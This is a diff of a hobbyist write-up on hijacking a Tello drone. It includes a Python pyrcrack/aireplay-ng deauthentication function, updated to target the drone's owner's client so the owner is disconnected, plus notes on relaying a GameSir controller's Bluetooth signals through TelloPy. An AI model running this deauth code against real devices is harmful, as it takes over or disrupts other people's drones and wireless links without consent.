rainbowflesh/rainbowflesh.github.io/docs/tello_hack.md

 from pyrcrack import AireplayNg

-async def deauth(interface, macaddr):
+async def deauth(interface, macaddr, cliaddr):
     async with AireplayNg() as aireplay:
-        async for res in aireplay(interface, deauth=10, D=True, a=macaddr):
+        async for res in aireplay(interface, deauth=10, D=True, a=macaddr, c=cliaddr):
             await asyncio.sleep(1)

 # Usage:
-# asyncio.run(deauth('wlan_card_mon','kismet.device.base.macaddr'))
+# asyncio.run(deauth('wlan_card_mon','kismet.device.base.macaddr','dot11.device/dot11.device.associate_ssid_map'))
 ```

+Declare "cliaddr" which is the last connection device from drone, let de-auth attack only effect between drone and its owner.

 ### Controller

-Because the GameSir T1d cannot connect to the drone directly when hacked, I decided to use **TelloPy** as controller middleware to convert the T1d signal into a drone control command.
+Duo to the GameSir T1d cannot connect to the drone directly when hacked, I decided to use **TelloPy** as controller middleware to convert the T1d signal into a drone control command.

 T1d uses Bluetooth protocol to transmit data; there are three Services, with the third receiving an unchanged byte stream and the second changing at random.
 The byte stream received by a Service whose UUID begins with `00008651` changes on a regular basis.